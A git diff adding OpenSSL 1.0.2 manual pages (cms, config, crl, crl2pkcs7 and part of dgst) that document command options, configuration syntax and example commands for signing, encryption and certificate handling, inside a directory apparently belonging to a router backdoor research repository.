+large files. Streaming is automatically set for S/MIME signing with detached
+data if the output format is B<SMIME> it is currently off by default for all
+other operations.
+
+=item B<-noindef>
+
+disable streaming I/O where it would produce and indefinite length constructed
+encoding. This option currently has no effect. In future streaming will be
+enabled by default on all relevant operations and this option will disable it.
+
+=item B<-content filename>
+
+This specifies a file containing the detached content, this is only
+useful with the B<-verify> command. This is only usable if the CMS
+structure is using the detached signature form where the content is
+not included. This option will override any content if the input format
+is S/MIME and it uses the multipart/signed MIME content type.
+
+=item B<-text>
+
+this option adds plain text (text/plain) MIME headers to the supplied
+message if encrypting or signing. If decrypting or verifying it strips
+off text headers: if the decrypted or verified message is not of MIME 
+type text/plain then an error occurs.
+
+=item B<-noout>
+
+for the B<-cmsout> operation do not output the parsed CMS structure. This
+is useful when combined with the B<-print> option or if the syntax of the CMS
+structure is being checked.
+
+=item B<-print>
+
+for the B<-cmsout> operation print out all fields of the CMS structure. This
+is mainly useful for testing purposes.
+
+=item B<-CAfile file>
+
+a file containing trusted CA certificates, only used with B<-verify>.
+
+=item B<-CApath dir>
+
+a directory containing trusted CA certificates, only used with
+B<-verify>. This directory must be a standard certificate directory: that
+is a hash of each subject name (using B<x509 -hash>) should be linked
+to each certificate.
+
+=item B<-md digest>
+
+digest algorithm to use when signing or resigning. If not present then the
+default digest algorithm for the signing key will be used (usually SHA1).
+
+=item B<-[cipher]>
+
+the encryption algorithm to use. For example triple DES (168 bits) - B<-des3>
+or 256 bit AES - B<-aes256>. Any standard algorithm name (as used by the
+EVP_get_cipherbyname() function) can also be used preceded by a dash, for 
+example B<-aes_128_cbc>. See L<B<enc>|enc(1)> for a list of ciphers
+supported by your version of OpenSSL.
+
+If not specified triple DES is used. Only used with B<-encrypt> and 
+B<-EncryptedData_create> commands.
+
+=item B<-nointern>
+
+when verifying a message normally certificates (if any) included in
+the message are searched for the signing certificate. With this option
+only the certificates specified in the B<-certfile> option are used.
+The supplied certificates can still be used as untrusted CAs however.
+
+=item B<-no_signer_cert_verify>
+
+do not verify the signers certificate of a signed message.
+
+=item B<-nocerts>
+
+when signing a message the signer's certificate is normally included
+with this option it is excluded. This will reduce the size of the
+signed message but the verifier must have a copy of the signers certificate
+available locally (passed using the B<-certfile> option for example).
+
+=item B<-noattr>
+
+normally when a message is signed a set of attributes are included which
+include the signing time and supported symmetric algorithms. With this
+option they are not included.
+
+=item B<-nosmimecap>
+
+exclude the list of supported algorithms from signed attributes, other options
+such as signing time and content type are still included.
+
+=item B<-binary>
+
+normally the input message is converted to "canonical" format which is
+effectively using CR and LF as end of line: as required by the S/MIME
+specification. When this option is present no translation occurs. This
+is useful when handling binary data which may not be in MIME format.
+
+=item B<-nodetach>
+
+when signing a message use opaque signing: this form is more resistant
+to translation by mail relays but it cannot be read by mail agents that
+do not support S/MIME.  Without this option cleartext signing with
+the MIME type multipart/signed is used.
+
+=item B<-certfile file>
+
+allows additional certificates to be specified. When signing these will
+be included with the message. When verifying these will be searched for
+the signers certificates. The certificates should be in PEM format.
+
+=item B<-certsout file>
+
+any certificates contained in the message are written to B<file>.
+
+=item B<-signer file>
+
+a signing certificate when signing or resigning a message, this option can be
+used multiple times if more than one signer is required. If a message is being
+verified then the signers certificates will be written to this file if the
+verification was successful.
+
+=item B<-recip file>
+
+when decrypting a message this specifies the recipients certificate. The
+certificate must match one of the recipients of the message or an error
+occurs.
+
+When encrypting a message this option may be used multiple times to specify
+each recipient. This form B<must> be used if customised parameters are
+required (for example to specify RSA-OAEP).
+
+=item B<-keyid>
+
+use subject key identifier to identify certificates instead of issuer name and
+serial number. The supplied certificate B<must> include a subject key
+identifier extension. Supported by B<-sign> and B<-encrypt> options.
+
+=item B<-receipt_request_all -receipt_request_first>
+
+for B<-sign> option include a signed receipt request. Indicate requests should
+be provided by all receipient or first tier recipients (those mailed directly
+and not from a mailing list). Ignored it B<-receipt_request_from> is included.
+
+=item B<-receipt_request_from emailaddress>
+
+for B<-sign> option include a signed receipt request. Add an explicit email
+address where receipts should be supplied.
+
+=item B<-receipt_request_to emailaddress>
+
+Add an explicit email address where signed receipts should be sent to. This 
+option B<must> but supplied if a signed receipt it requested.
+
+=item B<-receipt_request_print>
+
+For the B<-verify> operation print out the contents of any signed receipt
+requests.
+
+=item B<-secretkey key>
+
+specify symmetric key to use. The key must be supplied in hex format and be
+consistent with the algorithm used. Supported by the B<-EncryptedData_encrypt>
+B<-EncrryptedData_decrypt>, B<-encrypt> and B<-decrypt> options. When used
+with B<-encrypt> or B<-decrypt> the supplied key is used to wrap or unwrap the
+content encryption key using an AES key in the B<KEKRecipientInfo> type.
+
+=item B<-secretkeyid id>
+
+the key identifier for the supplied symmetric key for B<KEKRecipientInfo> type.
+This option B<must> be present if the B<-secretkey> option is used with
+B<-encrypt>. With B<-decrypt> operations the B<id> is used to locate the
+relevant key if it is not supplied then an attempt is used to decrypt any
+B<KEKRecipientInfo> structures.
+
+=item B<-econtent_type type>
+
+set the encapsulated content type to B<type> if not supplied the B<Data> type
+is used. The B<type> argument can be any valid OID name in either text or
+numerical format. 
+
+=item B<-inkey file>
+
+the private key to use when signing or decrypting. This must match the
+corresponding certificate. If this option is not specified then the
+private key must be included in the certificate file specified with
+the B<-recip> or B<-signer> file. When signing this option can be used
+multiple times to specify successive keys.
+
+=item B<-keyopt name:opt>
+
+for signing and encryption this option can be used multiple times to
+set customised parameters for the preceding key or certificate. It can
+currently be used to set RSA-PSS for signing, RSA-OAEP for encryption
+or to modify default parameters for ECDH.
+
+=item B<-passin arg>
+
+the private key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<cert.pem...>
+
+one or more certificates of message recipients: used when encrypting
+a message. 
+
+=item B<-to, -from, -subject>
+
+the relevant mail headers. These are included outside the signed
+portion of a message so they may be included manually. If signing
+then many S/MIME mail clients check the signers certificate's email
+address matches that specified in the From: address.
+
+=item B<-purpose, -ignore_critical, -issuer_checks, -crl_check, -crl_check_all, -policy_check, -extended_crl, -x509_strict, -policy -check_ss_sig>
+
+Set various certificate chain valiadition option. See the
+L<B<verify>|verify(1)> manual page for details.
+
+=back
+
+=head1 NOTES
+
+The MIME message must be sent without any blank lines between the
+headers and the output. Some mail programs will automatically add
+a blank line. Piping the mail directly to sendmail is one way to
+achieve the correct format.
+
+The supplied message to be signed or encrypted must include the
+necessary MIME headers or many S/MIME clients wont display it
+properly (if at all). You can use the B<-text> option to automatically
+add plain text headers.
+
+A "signed and encrypted" message is one where a signed message is
+then encrypted. This can be produced by encrypting an already signed
+message: see the examples section.
+
+This version of the program only allows one signer per message but it
+will verify multiple signers on received messages. Some S/MIME clients
+choke if a message contains multiple signers. It is possible to sign
+messages "in parallel" by signing an already signed message.
+
+The options B<-encrypt> and B<-decrypt> reflect common usage in S/MIME
+clients. Strictly speaking these process CMS enveloped data: CMS
+encrypted data is used for other purposes.
+
+The B<-resign> option uses an existing message digest when adding a new
+signer. This means that attributes must be present in at least one existing
+signer using the same message digest or this operation will fail.
+
+The B<-stream> and B<-indef> options enable experimental streaming I/O support.
+As a result the encoding is BER using indefinite length constructed encoding
+and no longer DER. Streaming is supported for the B<-encrypt> operation and the
+B<-sign> operation if the content is not detached.
+
+Streaming is always used for the B<-sign> operation with detached data but
+since the content is no longer part of the CMS structure the encoding
+remains DER.
+
+If the B<-decrypt> option is used without a recipient certificate then an
+attempt is made to locate the recipient by trying each potential recipient
+in turn using the supplied private key. To thwart the MMA attack
+(Bleichenbacher's attack on PKCS #1 v1.5 RSA padding) all recipients are
+tried whether they succeed or not and if no recipients match the message
+is "decrypted" using a random key which will typically output garbage. 
+The B<-debug_decrypt> option can be used to disable the MMA attack protection
+and return an error if no recipient can be found: this option should be used
+with caution. For a fuller description see L<CMS_decrypt(3)|CMS_decrypt(3)>).
+
+=head1 EXIT CODES
+
+=over 4
+
+=item Z<>0
+
+the operation was completely successfully.
+
+=item Z<>1
+
+an error occurred parsing the command options.
+
+=item Z<>2
+
+one of the input files could not be read.
+
+=item Z<>3
+
+an error occurred creating the CMS file or when reading the MIME
+message.
+
+=item Z<>4
+
+an error occurred decrypting or verifying the message.
+
+=item Z<>5
+
+the message was verified correctly but an error occurred writing out
+the signers certificates.
+
+=back
+
+=head1 COMPATIBILITY WITH PKCS#7 format.
+
+The B<smime> utility can only process the older B<PKCS#7> format. The B<cms>
+utility supports Cryptographic Message Syntax format. Use of some features
+will result in messages which cannot be processed by applications which only
+support the older format. These are detailed below.
+
+The use of the B<-keyid> option with B<-sign> or B<-encrypt>.
+
+The B<-outform PEM> option uses different headers.
+
+The B<-compress> option.
+
+The B<-secretkey> option when used with B<-encrypt>.
+
+The use of PSS with B<-sign>.
+
+The use of OAEP or non-RSA keys with B<-encrypt>.
+
+Additionally the B<-EncryptedData_create> and B<-data_create> type cannot
+be processed by the older B<smime> command.
+
+=head1 EXAMPLES
+
+Create a cleartext signed message:
+
+ openssl cms -sign -in message.txt -text -out mail.msg \
+	-signer mycert.pem
+
+Create an opaque signed message
+
+ openssl cms -sign -in message.txt -text -out mail.msg -nodetach \
+	-signer mycert.pem
+
+Create a signed message, include some additional certificates and
+read the private key from another file:
+
+ openssl cms -sign -in in.txt -text -out mail.msg \
+	-signer mycert.pem -inkey mykey.pem -certfile mycerts.pem
+
+Create a signed message with two signers, use key identifier:
+
+ openssl cms -sign -in message.txt -text -out mail.msg \
+	-signer mycert.pem -signer othercert.pem -keyid
+
+Send a signed message under Unix directly to sendmail, including headers:
+
+ openssl cms -sign -in in.txt -text -signer mycert.pem \
+	-from steve@openssl.org -to someone@somewhere \
+	-subject "Signed message" | sendmail someone@somewhere
+
+Verify a message and extract the signer's certificate if successful:
+
+ openssl cms -verify -in mail.msg -signer user.pem -out signedtext.txt
+
+Send encrypted mail using triple DES:
+
+ openssl cms -encrypt -in in.txt -from steve@openssl.org \
+	-to someone@somewhere -subject "Encrypted message" \
+	-des3 user.pem -out mail.msg
+
+Sign and encrypt mail:
+
+ openssl cms -sign -in ml.txt -signer my.pem -text \
+	| openssl cms -encrypt -out mail.msg \
+	-from steve@openssl.org -to someone@somewhere \
+	-subject "Signed and Encrypted message" -des3 user.pem
+
+Note: the encryption command does not include the B<-text> option because the
+message being encrypted already has MIME headers.
+
+Decrypt mail:
+
+ openssl cms -decrypt -in mail.msg -recip mycert.pem -inkey key.pem
+
+The output from Netscape form signing is a PKCS#7 structure with the
+detached signature format. You can use this program to verify the
+signature by line wrapping the base64 encoded structure and surrounding
+it with:
+
+ -----BEGIN PKCS7-----
+ -----END PKCS7-----
+
+and using the command, 
+
+ openssl cms -verify -inform PEM -in signature.pem -content content.txt
+
+alternatively you can base64 decode the signature and use
+
+ openssl cms -verify -inform DER -in signature.der -content content.txt
+
+Create an encrypted message using 128 bit Camellia:
+
+ openssl cms -encrypt -in plain.txt -camellia128 -out mail.msg cert.pem
+
+Add a signer to an existing message:
+
+ openssl cms -resign -in mail.msg -signer newsign.pem -out mail2.msg
+
+Sign mail using RSA-PSS:
+
+ openssl cms -sign -in message.txt -text -out mail.msg \
+	-signer mycert.pem -keyopt rsa_padding_mode:pss
+
+Create encrypted mail using RSA-OAEP:
+
+ openssl cms -encrypt -in plain.txt -out mail.msg \
+	-recip cert.pem -keyopt rsa_padding_mode:oaep
+
+Use SHA256 KDF with an ECDH certificate:
+
+ openssl cms -encrypt -in plain.txt -out mail.msg \
+	-recip ecdhcert.pem -keyopt ecdh_kdf_md:sha256
+
+=head1 BUGS
+
+The MIME parser isn't very clever: it seems to handle most messages that I've
+thrown at it but it may choke on others.
+
+The code currently will only write out the signer's certificate to a file: if
+the signer has a separate encryption certificate this must be manually
+extracted. There should be some heuristic that determines the correct
+encryption certificate.
+
+Ideally a database should be maintained of a certificates for each email
+address.
+
+The code doesn't currently take note of the permitted symmetric encryption
+algorithms as supplied in the SMIMECapabilities signed attribute. this means the
+user has to manually include the correct encryption algorithm. It should store
+the list of permitted ciphers in a database and only use those.
+
+No revocation checking is done on the signer's certificate.
+
+=head1 HISTORY
+
+The use of multiple B<-signer> options and the B<-resign> command were first
+added in OpenSSL 1.0.0
+
+The B<keyopt> option was first added in OpenSSL 1.1.0
+
+The use of B<-recip> to specify the recipient when encrypting mail was first
+added to OpenSSL 1.1.0
+
+Support for RSA-OAEP and RSA-PSS was first added to OpenSSL 1.1.0. 
+
+The use of non-RSA keys with B<-encrypt> and B<-decrypt> was first added
+to OpenSSL 1.1.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/config.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/config.pod
new file mode 100644
index 0000000..25c5381
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/config.pod
@@ -0,0 +1,279 @@
+
+=pod
+
+=for comment openssl_manual_section:5
+
+=head1 NAME
+
+config - OpenSSL CONF library configuration files
+
+=head1 DESCRIPTION
+
+The OpenSSL CONF library can be used to read configuration files.
+It is used for the OpenSSL master configuration file B<openssl.cnf>
+and in a few other places like B<SPKAC> files and certificate extension
+files for the B<x509> utility. OpenSSL applications can also use the
+CONF library for their own purposes.
+
+A configuration file is divided into a number of sections. Each section
+starts with a line B<[ section_name ]> and ends when a new section is
+started or end of file is reached. A section name can consist of
+alphanumeric characters and underscores.
+
+The first section of a configuration file is special and is referred
+to as the B<default> section this is usually unnamed and is from the
+start of file until the first named section. When a name is being looked up
+it is first looked up in a named section (if any) and then the
+default section.
+
+The environment is mapped onto a section called B<ENV>.
+
+Comments can be included by preceding them with the B<#> character
+
+Each section in a configuration file consists of a number of name and
+value pairs of the form B<name=value>
+
+The B<name> string can contain any alphanumeric characters as well as
+a few punctuation symbols such as B<.> B<,> B<;> and B<_>.
+
+The B<value> string consists of the string following the B<=> character
+until end of line with any leading and trailing white space removed.
+
+The value string undergoes variable expansion. This can be done by
+including the form B<$var> or B<${var}>: this will substitute the value
+of the named variable in the current section. It is also possible to
+substitute a value from another section using the syntax B<$section::name>
+or B<${section::name}>. By using the form B<$ENV::name> environment
+variables can be substituted. It is also possible to assign values to
+environment variables by using the name B<ENV::name>, this will work
+if the program looks up environment variables using the B<CONF> library
+instead of calling B<getenv()> directly.
+
+It is possible to escape certain characters by using any kind of quote
+or the B<\> character. By making the last character of a line a B<\>
+a B<value> string can be spread across multiple lines. In addition
+the sequences B<\n>, B<\r>, B<\b> and B<\t> are recognized.
+
+=head1 OPENSSL LIBRARY CONFIGURATION
+
+In OpenSSL 0.9.7 and later applications can automatically configure certain
+aspects of OpenSSL using the master OpenSSL configuration file, or optionally
+an alternative configuration file. The B<openssl> utility includes this
+functionality: any sub command uses the master OpenSSL configuration file
+unless an option is used in the sub command to use an alternative configuration
+file.
+
+To enable library configuration the default section needs to contain an 
+appropriate line which points to the main configuration section. The default
+name is B<openssl_conf> which is used by the B<openssl> utility. Other
+applications may use an alternative name such as B<myapplicaton_conf>.
+
+The configuration section should consist of a set of name value pairs which
+contain specific module configuration information. The B<name> represents
+the name of the I<configuration module> the meaning of the B<value> is 
+module specific: it may, for example, represent a further configuration
+section containing configuration module specific information. E.g.
+
+ openssl_conf = openssl_init
+
+ [openssl_init]
+
+ oid_section = new_oids
+ engines = engine_section
+
+ [new_oids]
+
+ ... new oids here ...
+
+ [engine_section]
+
+ ... engine stuff here ...
+
+Currently there are two configuration modules. One for ASN1 objects another
+for ENGINE configuration.
+
+=head2 ASN1 OBJECT CONFIGURATION MODULE
+
+This module has the name B<oid_section>. The value of this variable points
+to a section containing name value pairs of OIDs: the name is the OID short
+and long name, the value is the numerical form of the OID. Although some of
+the B<openssl> utility sub commands already have their own ASN1 OBJECT section
+functionality not all do. By using the ASN1 OBJECT configuration module
+B<all> the B<openssl> utility sub commands can see the new objects as well
+as any compliant applications. For example:
+
+ [new_oids]
+ 
+ some_new_oid = 1.2.3.4
+ some_other_oid = 1.2.3.5
+
+In OpenSSL 0.9.8 it is also possible to set the value to the long name followed
+by a comma and the numerical OID form. For example:
+
+ shortName = some object long name, 1.2.3.4
+
+=head2 ENGINE CONFIGURATION MODULE
+
+This ENGINE configuration module has the name B<engines>. The value of this
+variable points to a section containing further ENGINE configuration
+information.
+
+The section pointed to by B<engines> is a table of engine names (though see
+B<engine_id> below) and further sections containing configuration information
+specific to each ENGINE.
+
+Each ENGINE specific section is used to set default algorithms, load
+dynamic, perform initialization and send ctrls. The actual operation performed
+depends on the I<command> name which is the name of the name value pair. The
+currently supported commands are listed below.
+
+For example:
+
+ [engine_section]
+
+ # Configure ENGINE named "foo"
+ foo = foo_section
+ # Configure ENGINE named "bar"
+ bar = bar_section
+
+ [foo_section]
+ ... foo ENGINE specific commands ...
+
+ [bar_section]
+ ... "bar" ENGINE specific commands ...
+
+The command B<engine_id> is used to give the ENGINE name. If used this 
+command must be first. For example:
+
+ [engine_section]
+ # This would normally handle an ENGINE named "foo"
+ foo = foo_section
+
+ [foo_section]
+ # Override default name and use "myfoo" instead.
+ engine_id = myfoo
+
+The command B<dynamic_path> loads and adds an ENGINE from the given path. It
+is equivalent to sending the ctrls B<SO_PATH> with the path argument followed
+by B<LIST_ADD> with value 2 and B<LOAD> to the dynamic ENGINE. If this is
+not the required behaviour then alternative ctrls can be sent directly
+to the dynamic ENGINE using ctrl commands.
+
+The command B<init> determines whether to initialize the ENGINE. If the value
+is B<0> the ENGINE will not be initialized, if B<1> and attempt it made to
+initialized the ENGINE immediately. If the B<init> command is not present
+then an attempt will be made to initialize the ENGINE after all commands in
+its section have been processed.
+
+The command B<default_algorithms> sets the default algorithms an ENGINE will
+supply using the functions B<ENGINE_set_default_string()>
+
+If the name matches none of the above command names it is assumed to be a
+ctrl command which is sent to the ENGINE. The value of the command is the 
+argument to the ctrl command. If the value is the string B<EMPTY> then no
+value is sent to the command.
+
+For example:
+
+
+ [engine_section]
+
+ # Configure ENGINE named "foo"
+ foo = foo_section
+
+ [foo_section]
+ # Load engine from DSO
+ dynamic_path = /some/path/fooengine.so
+ # A foo specific ctrl.
+ some_ctrl = some_value
+ # Another ctrl that doesn't take a value.
+ other_ctrl = EMPTY
+ # Supply all default algorithms
+ default_algorithms = ALL
+
+=head1 NOTES
+
+If a configuration file attempts to expand a variable that doesn't exist
+then an error is flagged and the file will not load. This can happen
+if an attempt is made to expand an environment variable that doesn't
+exist. For example in a previous version of OpenSSL the default OpenSSL
+master configuration file used the value of B<HOME> which may not be
+defined on non Unix systems and would cause an error.
+
+This can be worked around by including a B<default> section to provide
+a default value: then if the environment lookup fails the default value
+will be used instead. For this to work properly the default value must
+be defined earlier in the configuration file than the expansion. See
+the B<EXAMPLES> section for an example of how to do this.
+
+If the same variable exists in the same section then all but the last
+value will be silently ignored. In certain circumstances such as with
+DNs the same field may occur multiple times. This is usually worked
+around by ignoring any characters before an initial B<.> e.g.
+
+ 1.OU="My first OU"
+ 2.OU="My Second OU"
+
+=head1 EXAMPLES
+
+Here is a sample configuration file using some of the features
+mentioned above.
+
+ # This is the default section.
+ 
+ HOME=/temp
+ RANDFILE= ${ENV::HOME}/.rnd
+ configdir=$ENV::HOME/config
+
+ [ section_one ]
+
+ # We are now in section one.
+
+ # Quotes permit leading and trailing whitespace
+ any = " any variable name "
+
+ other = A string that can \
+ cover several lines \
+ by including \\ characters
+
+ message = Hello World\n
+
+ [ section_two ]
+
+ greeting = $section_one::message
+
+This next example shows how to expand environment variables safely.
+
+Suppose you want a variable called B<tmpfile> to refer to a
+temporary filename. The directory it is placed in can determined by
+the the B<TEMP> or B<TMP> environment variables but they may not be
+set to any value at all. If you just include the environment variable
+names and the variable doesn't exist then this will cause an error when
+an attempt is made to load the configuration file. By making use of the
+default section both values can be looked up with B<TEMP> taking 
+priority and B</tmp> used if neither is defined:
+
+ TMP=/tmp
+ # The above value is used if TMP isn't in the environment
+ TEMP=$ENV::TMP
+ # The above value is used if TEMP isn't in the environment
+ tmpfile=${ENV::TEMP}/tmp.filename
+
+=head1 BUGS
+
+Currently there is no way to include characters using the octal B<\nnn>
+form. Strings are all null terminated so nulls cannot form part of
+the value.
+
+The escaping isn't quite right: if you want to use sequences like B<\n>
+you can't use any quote escaping on the same line.
+
+Files are loaded in a single pass. This means that an variable expansion
+will only work if the variables referenced are defined earlier in the
+file.
+
+=head1 SEE ALSO
+
+L<x509(1)|x509(1)>, L<req(1)|req(1)>, L<ca(1)|ca(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/crl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/crl.pod
new file mode 100644
index 0000000..044a9da
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/crl.pod
@@ -0,0 +1,128 @@
+=pod
+
+=head1 NAME
+
+crl - CRL utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<crl>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-text>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-nameopt option>]
+[B<-noout>]
+[B<-hash>]
+[B<-issuer>]
+[B<-lastupdate>]
+[B<-nextupdate>]
+[B<-CAfile file>]
+[B<-CApath dir>]
+
+=head1 DESCRIPTION
+
+The B<crl> command processes CRL files in DER or PEM format.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. B<DER> format is DER encoded CRL
+structure. B<PEM> (the default) is a base64 encoded version of
+the DER form with header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read from or standard input if this
+option is not specified.
+
+=item B<-out filename>
+
+specifies the output filename to write to or standard output by
+default.
+
+=item B<-text>
+
+print out the CRL in text form.
+
+=item B<-nameopt option>
+
+option which determines how the subject or issuer names are displayed. See
+the description of B<-nameopt> in L<x509(1)|x509(1)>.
+
+=item B<-noout>
+
+don't output the encoded version of the CRL.
+
+=item B<-hash>
+
+output a hash of the issuer name. This can be use to lookup CRLs in
+a directory by issuer name.
+
+=item B<-hash_old>
+
+outputs the "hash" of the CRL issuer name using the older algorithm
+as used by OpenSSL versions before 1.0.0.
+
+=item B<-issuer>
+
+output the issuer name.
+
+=item B<-lastupdate>
+
+output the lastUpdate field.
+
+=item B<-nextupdate>
+
+output the nextUpdate field.
+
+=item B<-CAfile file>
+
+verify the signature on a CRL by looking up the issuing certificate in
+B<file>
+
+=item B<-CApath dir>
+
+verify the signature on a CRL by looking up the issuing certificate in
+B<dir>. This directory must be a standard certificate directory: that
+is a hash of each subject name (using B<x509 -hash>) should be linked
+to each certificate.
+
+=back
+
+=head1 NOTES
+
+The PEM CRL format uses the header and footer lines:
+
+ -----BEGIN X509 CRL-----
+ -----END X509 CRL-----
+
+=head1 EXAMPLES
+
+Convert a CRL file from PEM to DER:
+
+ openssl crl -in crl.pem -outform DER -out crl.der
+
+Output the text form of a DER encoded certificate:
+
+ openssl crl -in crl.der -text -noout
+
+=head1 BUGS
+
+Ideally it should be possible to create a CRL using appropriate options
+and files too.
+
+=head1 SEE ALSO
+
+L<crl2pkcs7(1)|crl2pkcs7(1)>, L<ca(1)|ca(1)>, L<x509(1)|x509(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/crl2pkcs7.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/crl2pkcs7.pod
new file mode 100644
index 0000000..3797bc0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/crl2pkcs7.pod
@@ -0,0 +1,91 @@
+=pod
+
+=head1 NAME
+
+crl2pkcs7 - Create a PKCS#7 structure from a CRL and certificates.
+
+=head1 SYNOPSIS
+
+B<openssl> B<crl2pkcs7>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-certfile filename>]
+[B<-nocrl>]
+
+=head1 DESCRIPTION
+
+The B<crl2pkcs7> command takes an optional CRL and one or more
+certificates and converts them into a PKCS#7 degenerate "certificates
+only" structure.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the CRL input format. B<DER> format is DER encoded CRL
+structure.B<PEM> (the default) is a base64 encoded version of
+the DER form with header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the PKCS#7 structure output format. B<DER> format is DER
+encoded PKCS#7 structure.B<PEM> (the default) is a base64 encoded version of
+the DER form with header and footer lines.
+
+=item B<-in filename>
+
+This specifies the input filename to read a CRL from or standard input if this
+option is not specified.
+
+=item B<-out filename>
+
+specifies the output filename to write the PKCS#7 structure to or standard
+output by default.
+
+=item B<-certfile filename>
+
+specifies a filename containing one or more certificates in B<PEM> format.
+All certificates in the file will be added to the PKCS#7 structure. This
+option can be used more than once to read certificates form multiple
+files.
+
+=item B<-nocrl>
+
+normally a CRL is included in the output file. With this option no CRL is
+included in the output file and a CRL is not read from the input file.
+
+=back
+
+=head1 EXAMPLES
+
+Create a PKCS#7 structure from a certificate and CRL:
+
+ openssl crl2pkcs7 -in crl.pem -certfile cert.pem -out p7.pem
+
+Creates a PKCS#7 structure in DER format with no CRL from several
+different certificates:
+
+ openssl crl2pkcs7 -nocrl -certfile newcert.pem 
+	-certfile demoCA/cacert.pem -outform DER -out p7.der
+
+=head1 NOTES
+
+The output file is a PKCS#7 signed data structure containing no signers and
+just certificates and an optional CRL.
+
+This utility can be used to send certificates and CAs to Netscape as part of
+the certificate enrollment process. This involves sending the DER encoded output
+as MIME type application/x-x509-user-cert.
+
+The B<PEM> encoded form with the header and footer lines removed can be used to
+install user certificates and CAs in MSIE using the Xenroll control.
+
+=head1 SEE ALSO
+
+L<pkcs7(1)|pkcs7(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dgst.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dgst.pod
new file mode 100644
index 0000000..9e15798
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dgst.pod
@@ -0,0 +1,213 @@
+=pod
+
+=head1 NAME
+
+dgst, sha, sha1, mdc2, ripemd160, sha224, sha256, sha384, sha512, md2, md4, md5, dss1 - message digests
+
+=head1 SYNOPSIS
+
+B<openssl> B<dgst> 
+[B<-sha|-sha1|-mdc2|-ripemd160|-sha224|-sha256|-sha384|-sha512|-md2|-md4|-md5|-dss1>]
+[B<-c>]
+[B<-d>]
+[B<-hex>]
+[B<-binary>]
+[B<-r>]
+[B<-hmac arg>]
+[B<-non-fips-allow>]
+[B<-out filename>]
+[B<-sign filename>]
+[B<-keyform arg>]
+[B<-passin arg>]
+[B<-verify filename>]
+[B<-prverify filename>]
+[B<-signature filename>]
+[B<-hmac key>]
+[B<-non-fips-allow>]
+[B<-fips-fingerprint>]
+[B<file...>]
+
+B<openssl>
+[I<digest>]
+[B<...>]
+
+=head1 DESCRIPTION
+
+The digest functions output the message digest of a supplied file or files
+in hexadecimal.  The digest functions also generate and verify digital
+signatures using message digests.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-c>
+
+print out the digest in two digit groups separated by colons, only relevant if
+B<hex> format output is used.
+
+=item B<-d>
+
+print out BIO debugging information.
+
+=item B<-hex>
+
+digest is to be output as a hex dump. This is the default case for a "normal"
+digest as opposed to a digital signature.  See NOTES below for digital
+signatures using B<-hex>.
+
+=item B<-binary>
+
+output the digest or signature in binary form.
+
+=item B<-r>
+
+output the digest in the "coreutils" format used by programs like B<sha1sum>.
+
+=item B<-hmac arg>
+
+set the HMAC key to "arg".
+
+=item B<-non-fips-allow>
+
+Allow use of non FIPS digest when in FIPS mode.  This has no effect when not in
+FIPS mode.
+
+=item B<-out filename>
+
+filename to output to, or standard output by default.
+
+=item B<-sign filename>
+
+digitally sign the digest using the private key in "filename".
+
+=item B<-keyform arg>
+
+Specifies the key format to sign digest with. The DER, PEM, P12,
+and ENGINE formats are supported.
+
+=item B<-engine id>
+
+Use engine B<id> for operations (including private key storage).
+This engine is not used as source for digest algorithms, unless it is
+also specified in the configuration file.
+
+=item B<-sigopt nm:v>
+
+Pass options to the signature algorithm during sign or verify operations.
+Names and values of these options are algorithm-specific.
+
+
+=item B<-passin arg>
+
+the private key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-verify filename>
+
+verify the signature using the the public key in "filename".
+The output is either "Verification OK" or "Verification Failure".
+
+=item B<-prverify filename>
+
+verify the signature using the  the private key in "filename".
+
+=item B<-signature filename>
+
+the actual signature to verify.
+
+=item B<-hmac key>
+
+create a hashed MAC using "key".
+
+=item B<-mac alg>
+
+create MAC (keyed Message Authentication Code). The most popular MAC
+algorithm is HMAC (hash-based MAC), but there are other MAC algorithms
+which are not based on hash, for instance B<gost-mac> algorithm,
+supported by B<ccgost> engine. MAC keys and other options should be set
+via B<-macopt> parameter.
+
+=item B<-macopt nm:v>
+
+Passes options to MAC algorithm, specified by B<-mac> key.
+Following options are supported by both by B<HMAC> and B<gost-mac>:
+
+=over 8
+
+=item B<key:string>
+
+Specifies MAC key as alphnumeric string (use if key contain printable
